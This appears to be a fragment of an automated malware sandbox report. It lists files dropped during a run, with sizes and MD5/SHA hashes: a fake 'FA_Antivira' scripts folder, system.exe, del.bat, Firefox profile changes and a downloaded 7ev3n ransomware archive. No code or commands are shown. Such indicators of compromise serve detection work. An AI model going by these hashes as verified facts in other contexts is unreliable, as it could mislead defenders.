MD5a61c87927d31edff281df2818dde924d
SHA1f076867cb0411e0c584f2f9052d4c1e550cd53b7
SHA2569220b169c1f0179caa92218990b05bc48cf75c9c36d4e45dd1c2b5f973910517
SHA512ce5c730e3dea3c9b1a565b02925ca95ee0c50abfe15a5a8a43c21b4cb7daedd1b582ebf264dba5d7dc3fad98e1014e0557a810baa111e83596ecd22fde8fc970
-
C:\FA_Antivira\FAinfo4.vbsFilesize
97B
MD5d912098669bc85cc04cccf0248617120
SHA1a817741d0ce4427cf0a0fceb7ba483972789fc60
SHA256e044130f2e60f76a963f3e903af9d077f0ff1a8437d1c7d52ff42345e7e28422
SHA512578127a4aedf65bb415602b08c16c29724a874b35a40dce0e116b4bf6daf513e8a511f3aed2cee8756efd45ee9245a34381433abbef91ab3908859f47f013a48
-
C:\FA_Antivira\FApyHlp\FAscaninfo.txtFilesize
45B
MD54e2b85aa6bf52880f38fcbf8d83e52e4
SHA1bef98ffe5e847fa96d848a3012903db0f4401475
SHA2567f42aa18673109c66a1dace36239fb98ce9f66cc8efbe8e56aeba47a1fe5d2ad
SHA512115eafbfdcb4bc30ef697331848e2771e4a21401000a768237bfc7afc8014a684ad1c68ed30359012458a39a29956cdbd8fbe9f94116ea51d361209fc60ca08f
-
C:\FA_Antivira\FApyHlp\FAstartmenuinfo.txtFilesize
121B
MD5cd506886f7c209e3fe64968e806724a2
SHA1acec50c5336fb9b157ca56f49d790cd40485e20f
SHA256123d7fdf0d6a518acfe91ddd2a518d7f55e7f02682561ddec9a9fa9e6b9515b7
SHA51260fc4c52a855fb64fc6df5a80cb345026cb4adb3614c91c25966e0485f7ffb70df263a64c21ec51c9c923e8ec42f277002b0115d0e3783f92e10eccc88876800
-
C:\FA_Antivira\FAshortcutinstallerdesktop.batFilesize
579B
MD543ac0b308354a69a243ade90d4710a48
SHA1eb13fd963da445a000a2bde81254a6165fb35ede
SHA256a66196a3237ebee214521d8a60c9747137c2abd928dd3123663ce6bf5b760bc7
SHA512e5a8f9934c72492bb7631140a6bedb0d114f8dbc9b4c1a7cf80976216db0e9acba411cf0841bfee988a3eee2639a0596919a51c6eaeced3ab1a62de2abe96ab0
-
C:\FA_Antivira\FAurlDataBank.txtFilesize
14KB
MD5db5e09a2e865744035faa37a94b0671c
SHA1a40af153926484e43f658c2a99fcf71157483446
SHA256dc13e83fb60435c3812f46b41a6eab2eca028f8c1eeed1b7b731f34a896e87ae
SHA512553289398e12fb169fe00264c5b6ae7a56140f2550a5360cf98585a2fbf4ee0917c3aae8167a6370ae5d2300c52138ae0c948c34b1beee503b6eab5cf34e893e
-
C:\FA_Antivira\FAvbs\FAbuttenUser.vbsFilesize
1KB
MD5f2f1d25a0733f5bbad7c729096e4810f
SHA188c073043fa9bc4c6660837f1f90f1a7a42a35fc
SHA25619f7da333b1ac0483d06821dbaa6640445442a06f603c9d8d3665269112abddf
SHA5120a2cdd4ff70945d1da0d88b532b0f31e4285fb4297302cc574fdde1d2dd9006d3ced8b71fecb9cc58e1792863733c64bd9c452a1c888dfb4e1e4e1340784c1e1
-
C:\FA_Antivira\FAwlc.vbsFilesize
37B
MD58af233a3816f2564fe1dd935a228eed5
SHA1e135f58494c4aa12e4c3fc1c6a5645716bac5384
SHA2569c30303185a1337fa4f8b22c5cf93bfa40b5f437bc82abd168c4aa0a85889ec0
SHA5122fce3e661e3d677848817d80567fdff464bc5c12badf3ff454576252facd49b159bd00e8da6ed96fc9748ca0c8b9d24d64a35651c29de1daaf2cc718fdbff8c2
-
C:\FA_Antivira\Fabi_Antivira_Securety.batFilesize
273B
MD5c67e9bfe1056431c086554c2206401a3
SHA17d7b11a79233fdc2c5b8dcd0e9edf5a028324453
SHA256d7b9799fdfefc9e083dc43cf74e7f8019a5f1e74c68e30ad54fdd208383cb2c4
SHA512e38c705f3cbdddc0b437459d1e9ce3b37e421da2d137f091ecd399eeed07b2d491abc39ea420546f2b68c6a6266ae99ee75ca3be656ddd5496513d7643be8b3d
-
C:\FA_Antivira\Python\FAMsh.pyFilesize
2KB
MD5ac02c7e35e75be6d744ab7a5e274de49
SHA1796d6c8a93997fc603c714a3346f42fcfa11ed13
SHA256c8c9b044439f06cf6ae2eed53230612e5960a2871779b06a1d73d56e4c528de0
SHA51228b5ee17c21093666abb11ff88afa87ea7f3aa880662809d8cf2192c8c5236b1435f6517186a4fad46c8919b063d27c9c43ccbf7bc7386ccd75197598532c195
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\activity-stream.discovery_stream.json.tmpFilesize
22KB
MD587d4cacc37cf33bd27b98d5b0223af5f
SHA1e9b1cf374d1facc3576a3fe40739a188b42e60ef
SHA25647ea0c3f7cad7ed0894eeae8d2ebc195e6bfeb95fc03db9296ede503fa9ee2ce
SHA512e288f99029f9e2af8d1f0ad661118eb30de4eba0dbf6a0e23bd97be2686f8293d559956e39b9bb619c6a1438a149b66e72dcef36c84fe9a5cb938b3259f94870
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\cache2\doomed\16396Filesize
16KB
MD59e9da9a76fb06cd1c67845ed99c3e574
SHA12c3665a1b7166bd5354828c8b7bbefb766c91b40
SHA2567654006f1078ba13e00e78794707c565a9767044f1c1e6150780c02849b81aae
SHA51284888b1603bd35930b33c38d1872e1d971c5668a13ea98fd30dce2ea46d0013be96c8b627639dfe79ce67f31a6e1cace84bd01edc48e76bff1d176bb630d15f8
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\cache2\doomed\17004Filesize
16KB
MD529eab85250c99af75bbe3cf1a361c589
SHA120c650983db846530cafb5d5b048841e1106e36c
SHA256539f003f276b6e339bced78c6017705b9a76d82d863ae307cbfad088b2276dfe
SHA5127e0b281b839f084df1de65add45d9521f965928ea56ca4f97cc487386d3f4f7a3fe710eb6b7462c3d48d7ed30fbb95e2df535bdf183aafb7c7434f72475a992e
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\cache2\doomed\17228Filesize
16KB
MD5b818a2b8a4f6b8127b7904804b70b768
SHA118e699373bdb071b4c53debc1dfd4053564c9fcb
SHA2564972f8c60141a6097b3b3a56dfdfd995a4da786b4fbc8fc48d2556c7bf8891c4
SHA512b130033af84bfd5e53d6a30c102450927ec4fc80023fa240fe7e657afdd0f8b99847847dd94bf50836214854950f5fa47d84845c4378c73e4e1dbfc486f2c42d
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\cache2\doomed\24088Filesize
15KB
MD52e13d38a2bea33b1e5e9690ccd55f768
SHA16269d8363adc38d30d48ed7a254fc89c48eb6725
SHA256e1147eec64863f47c262448b5ac7d7932457ac1eab7ddc25f47f230f1cffcb28
SHA512a0c4401eae9f05cee0983de6746a2356d75bf175b4f7b4bc7ec799c53d4e30873cd97096df858642aeeb179ad08ee4b90046239b4dba7404227522d79e8d3ce3
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\cache2\doomed\3110Filesize
16KB
MD5d24aaf9a6a8548e6d57e6c2d2f523368
SHA115e2444d8385f993c2a07c99aba7def31fad9781
SHA256dcb8ed610164c30221bd5315825956de688d909dd94e7cdeeadff6da3c13ea41
SHA5128a86cbd44a521c434f3ace1d92db6c477ef12f0127dadd0bbf7890ae3fd9eb4dac1e0bfd4df1dc726253ecc2d219862976ccbc222995b822017d6dcb6d1acaba
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jmda4uxp.ipl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\del.batFilesize
65B
MD55be54536acf6854d3d0217fee5092ce3
SHA1823d25753559795f3b5a53de6b019b8815abc834
SHA256076a50ec803f409306be46309faf35ddca3f7a41f6a884a0e0ce55497c10cb62
SHA512b92ff21c43b6fa1a9711e7422a328583bf304bf7e2020c466825ce9172e6a31c4b04ce4adaf14a0e72a3eab364493dbfccbfb64586deab687c900ebbe541c681
-
C:\Users\Admin\AppData\Local\system.exeFilesize
315KB
MD585f1a8765f380669390de3ce2de8a8f8
SHA1006697ee6244a06372d2540f1f64d7b2022eace2
SHA256cba24647f82eecc726c5ee0ab314306b1c565de7d0b70b692610a725714f188f
SHA5120ebf704e36c8e90274c240726a8cfc72a9bcb5918a0f8f45b721a6cbb5a4216d5c7439c8e1b33dc3bba7cfef4dc45e723d120907a37555abeb0d0f85be8fd0ad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs-1.jsFilesize
7KB
MD55508305bd564522b285d59f19bae9335
SHA19d3edcc3a31515f365854633a833d39a2379776b
SHA25654a912b787cb651584bd059b4f23c03adfeb0281eae11a595f96a68902eff413
SHA51248d29c2b528b1b2cd5411969638a8cc3daf3652e0a8cfc55dad09f253a66fff5a97b200c1123af28bc5a95ead43dad5659c4eded7f7f208d2c188959e2f046de
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs-1.jsFilesize
7KB
MD557619d4ad5490ecb6a315e473b99e2af
SHA1191d45c5a9355f74d97abc82b39c16a903ccfb8e
SHA256ffd7f9dc3c4dfd537b68482d112de2b248b30fb58a0824dbb767ed95632dd5af
SHA5126b547ea34e6c210df6d3c889b12b392cb3fe8dfac60a9af7d6a843f2bd95bab1415194dc9da98b0a26c90da6b100bfabd9d0cf2e50efb9bae19a897725f8897b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs-1.jsFilesize
6KB
MD5c682648e7c3b36078ccf597529d393e0
SHA18e6dae64af3b8d0d43d7adb7a89eab67d11a98d1
SHA2567a7e99090e02611d7187dcf5f160215abff51258b8c99d79200990aefa6c8de9
SHA512503b340da2efbb3749739346059694f5503fdb6dded29f19980776527e1896dc95cc5f41a9378fc49712d0e70b1cf311d9d0d89dc8975ef6513cfee6f8bb975a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs.jsFilesize
7KB
MD5e7c196c96735923f52a5e36eb9f3fe55
SHA1afecbedf9f802ae75d421996ff89257654b43806
SHA2569ebf5f587a6ec6f64c2472886b8f5e0b528895eb4e96b0701add0c0f4e99e3aa
SHA512d669221b817efad602d9debd4335013756b5fff859345bdc01d33b7a312db9f8cd97507e168beed36e33482d71eb9671e9de8d0a4bbe04a17f0231446d8871ce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionCheckpoints.json.tmpFilesize
259B
MD5e6c20f53d6714067f2b49d0e9ba8030e
SHA1f516dc1084cdd8302b3e7f7167b905e603b6f04f
SHA25650a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092
SHA512462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore-backups\recovery.jsonlz4Filesize
3KB
MD53618946c468e8c76eba39b00ba90fcd4
SHA19b98445621578fd85ae09aab998cb8d55f745f39
SHA2561d3f7e3644e1ee73658635df854ff70698e445613ff841089f6163803ce8dbbc
SHA512a6ed83b3aeb6375119bebf0405216fad7dbac3ccbdd338a2745dfeddf46103ba71a4362f6d81546a34983bb741c797b6bf62cff1b860c890ec8e45ea8ce4b36a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore-backups\recovery.jsonlz4Filesize
8KB
MD53312767e2a127323c24d6cd44565f383
SHA1165f36aed4c7c61842f72c1d0ab04447a1f8b705
SHA256643b865de45e39c73470dc1ae31f8552b325f929ae449fb225376d5312c6cfc2
SHA512a485d1661aca1cb8f52bfd020b1490b13054ed0ee9075e3a8211a1d5ab4de08771b4a9ba16f85a2360a342908dae36cc6f7b5c8d219f358e11631ba8e01947b4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore-backups\recovery.jsonlz4Filesize
5KB
MD55e4080b11534a806740a495a7658cdd3
SHA1c1bce0a882a76da2bc98a318bbced592d96c6d52
SHA2561ea9ffc00cdbc3b23cd585536d5b9aa6160149c1c14b265ad721487a896f0526
SHA512003c344e95e8b37dab93ca8f6369436172a3351651415d4158f0f08c34c998d440bb9c0963489b59534309cf53a889c93bd951891b57dd06ed15273aa180fded
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\sessionstore.jsonlz4Filesize
8KB
MD54762241e4f6ddbcca24cab09baacd672
SHA114c16041a48925b04c5fff6846a7c87720743081
SHA25665196548070bff42a860cbca39e914fd865bee3454da1de9571e7ec72a112feb
SHA512dc3d82d181d4aa2d718e2bcf744a828385d9b58cc4160798f76d44cf17016081deee11f75b430ac5611830e8ff03f2c4e11f4ce0b4eb90f393b0b0278e190237
-
C:\Users\Admin\Downloads\7ev3n.NHqhRU4J.zip.partFilesize
31KB
MD5c686b8f6e0df311445c5feb88f3e8835
SHA10338d0093e5a8f05b04b6f601e96a714ef97d252
SHA256a917acfdf0ceed0e37f0c698a6c47655123cb97dd917e961937e833265a11308
SHA512c4b3e7d041a23c5379f2ef8f2c46581004d39fdef16c68636b51aa5832871e9b6d22d514120fb52dadeaf61613218917034d695338b3837c71f3ff34bdecfc0b
-
C:\Users\Admin\Downloads\7ev3n.zipFilesize
139KB
MD585a5c7b6d0e7b7451295278a9bb40eb0
SHA177a258417a7294cc354bc4d883f0537de8dea579
SHA256be1fd9cb06b2083b60f4878a1c6de0ae41e22b25daa2478634f9d6d8df9f92ca
SHA5123db3c96fbcacf33c75ba9dd3b2f8fb3218031d10da4acb844fe10a8115488fffbedff6c42dc15a643d07f5ce630d4c16babc0ade3bbd3d1ce94fb319e432df8c
-
memory/2244-81-0x00000182B3BE0000-0x00000182B3BF0000-memory.dmpFilesize
64KB
-
memory/2244-74-0x00000182B3BA0000-0x00000182B3BC2000-memory.dmpFilesize
136KB
-
memory/2244-80-0x00000182B3BE0000-0x00000182B3BF0000-memory.dmpFilesize
64KB
-
memory/2244-79-0x00007FF84CA60000-0x00007FF84D521000-memory.dmpFilesize
10.8MB
-
memory/2244-86-0x00007FF84CA60000-0x00007FF84D521000-memory.dmpFilesize
10.8MB